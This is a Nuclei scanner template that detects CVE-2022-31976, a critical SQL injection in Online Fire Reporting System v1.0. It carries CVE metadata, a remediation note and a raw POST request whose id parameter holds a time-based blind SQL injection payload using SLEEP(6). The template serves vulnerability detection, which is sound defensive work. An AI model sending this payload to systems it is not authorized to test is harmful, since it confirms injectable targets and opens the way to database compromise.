nuclei-templates/http/cves/2022/CVE-2022-31976.yaml

50 lines
1.8 KiB
YAML

id: CVE-2022-31976
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: critical
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_request.
remediation: |
To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-4.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31976
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-31976
cwe-id: CWE-89
epss-score: 0.00942
epss-percentile: 0.81341
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: online_fire_reporting_system_project
product: online_fire_reporting_system
tags: cve,cve2022,sqli,online-fire-reporting
http:
- raw:
- |
@timeout: 10s
POST /classes/Master.php?f=delete_request HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
id='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "status\":\"success\"}")'
condition: and
# digest: 4a0a00473045022100e808e4cd528205a9a42e7974a4fd023b8cafc5528de62a7c8c0948b887977c710220542f1a4503919865d018b4b5a8597584b299135806988c4156e024f14434db7f:922c64590222798bb761d5b6d8e72950